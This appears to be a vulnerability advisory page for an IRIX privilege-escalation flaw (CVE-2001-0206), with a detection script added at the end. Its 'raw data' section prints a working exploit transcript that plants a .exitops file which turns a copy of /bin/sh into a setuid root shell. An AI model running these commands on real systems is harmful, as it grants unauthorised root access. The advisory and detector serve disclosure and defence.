Vendor: IRIX
By: SecurityFocus
CVSS: 8.8 (HIGH)
Systour and OutOfBox Subsystems Privilege Escalation
CWE: 264
Product Name: IRIX
Affected Version From: IRIX 5.x
Affected Version To: IRIX 6.x
Patch Exists: YES
Related CWE: CVE-2001-0206
CPE: o:sgi:irix
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2001

Systour and OutOfBox Subsystems Privilege Escalation

A vulnerability exists in both the Systour and OutOfBox subsystems included with new installs of IRIX 5.x and 6.x from SGI. This vulnerability allows users on the system to run arbitrary commands as root. An attacker can exploit this vulnerability by creating a malicious .exitops file in the $HOME/var/inst directory and then running the RemoveSystemTour command. This will execute the malicious .exitops file as root, allowing the attacker to gain root privileges.

Mitigation:

SGI has released a patch to address this vulnerability.

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/470/info

A vulnerability exists in both the Systour and OutOfBox subsystems included with new installs of IRIX 5.x and 6.x from SGI. This vulnerability allows users on the system to run arbitrary commands as root.

$ rbase=$HOME; export rbase
$ mkdir -p $HOME/var/inst
$ echo "dryrun: true" > $HOME/.swmgrrc
$ cp -p /bin/sh /tmp/foobar
$ printf '#\!/bin/sh\nchmod 4777 /tmp/foobar\n' > $HOME/var/inst/.exitops
$ chmod a+x $HOME/var/inst/.exitops
$ /usr/lib/tour/bin/RemoveSystemTour
Executing outstanding exit-commands from previous session ..
Successfully completed exit-commands from previous session.
Reading installation history
Checking dependencies
ERROR : Software Manager: automatic installation failed: New
target (nothing installed) and no distribution.
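
The transcript above leaves three things on disk: an .exitops file under a user's home directory, a .swmgrrc that forces dry-run mode, and a setuid file in /tmp. The script below is an added example, not part of the original advisory or of SGI's patch, that reports those artifacts; the function names, the finding labels and the two directory arguments are assumptions of this example.

```sh
#!/bin/sh
# Added example (not from the original advisory): report the files that the
# transcript above plants. Function names and arguments are assumptions.

# audit_home HOME_DIR: print one finding per line, nothing if clean.
audit_home() {
    home=$1
    # Exit-commands file under a user-writable directory: the transcript
    # creates $HOME/var/inst/.exitops before running RemoveSystemTour.
    if [ -f "$home/var/inst/.exitops" ]; then
        if [ -x "$home/var/inst/.exitops" ]; then
            echo "EXITOPS-EXEC $home/var/inst/.exitops"
        else
            echo "EXITOPS $home/var/inst/.exitops"
        fi
    fi
    # Software Manager resource file forcing dry-run, as in the transcript.
    if [ -f "$home/.swmgrrc" ] &&
       grep -q '^[[:space:]]*dryrun:[[:space:]]*true' "$home/.swmgrrc"; then
        echo "DRYRUN $home/.swmgrrc"
    fi
    return 0
}

# audit_setuid DIR: list setuid regular files in DIR (the transcript's
# payload sets mode 4777 on a copy of /bin/sh in /tmp).
audit_setuid() {
    find "$1" -type f -perm -4000 -print 2>/dev/null | sed 's/^/SETUID /'
    return 0
}

# audit_all HOMES_ROOT SCRATCH_DIR: run both checks and print all findings.
audit_all() {
    for d in "$1"/*; do
        [ -d "$d" ] && audit_home "$d"
    done
    audit_setuid "$2"
    return 0
}

# Run only when both directories are given: sh audit.sh <homes-root> /tmp
if [ "$#" -eq 2 ]; then
    audit_all "$1" "$2"
fi
```

An empty report only means these particular files are absent; the .exitops payload in the transcript is arbitrary, so the setuid check covers just the one shown.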